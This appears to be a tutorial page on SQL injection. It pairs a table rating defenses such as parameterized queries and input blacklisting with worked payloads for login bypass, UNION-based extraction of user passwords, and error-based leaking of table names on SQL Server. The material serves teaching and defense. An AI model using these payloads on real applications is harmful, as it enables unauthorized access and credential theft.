Last updated
Defense Comparison
Defense Effectiveness
------- -------------
Parameterized queries ✓ Highly effective — prevents all injection
Input blacklisting ✗ Insufficient — attackers bypass with encoding
Input whitelisting ✓ Good additional layer for specific fields
WAF ✗ Insufficient alone — can be bypassed
Stored procedures ✓ Effective when implemented correctly
Escaping ~ Risky — easy to miss edge cases
Examples
Example 1: Authentication Bypass
Sample vulnerable login query:
SELECT * FROM users WHERE username = '[INPUT]' AND password = '[INPUT]'
Injection payload: ' OR '1'='1'--
Resulting query:
SELECT * FROM users WHERE username = '' OR '1'='1'--' AND password = '...'
Effect: The -- comments out the password check.
'1'='1' is always true, so the WHERE clause matches ALL users.
The attacker logs in as the first user in the database (often an admin).
Other authentication bypass payloads:
' OR 1=1--
admin'--
' OR 'x'='x
') OR ('1'='1
Example 2: UNION-Based Data Extraction
Sample vulnerable product search:
SELECT name, price FROM products WHERE category = '[INPUT]'
Injection payload: ' UNION SELECT username, password FROM users--
Resulting query:
SELECT name, price FROM products WHERE category = ''
UNION SELECT username, password FROM users--'
Effect: The UNION appends results from the users table.
The attacker sees usernames and passwords in the product listing.
Finding the number of columns first:
' ORDER BY 1-- (no error = at least 1 column)
' ORDER BY 2-- (no error = at least 2 columns)
' ORDER BY 3-- (error = only 2 columns)
Then: ' UNION SELECT username, password FROM users--
Example 3: Error-Based Information Extraction
Payload: ' AND 1=CONVERT(int, (SELECT TOP 1 table_name FROM information_schema.tables))--
Effect (SQL Server): The database throws an error like:
"Conversion failed when converting the nvarchar value 'users' to data type int."
The table name 'users' is leaked in the error message.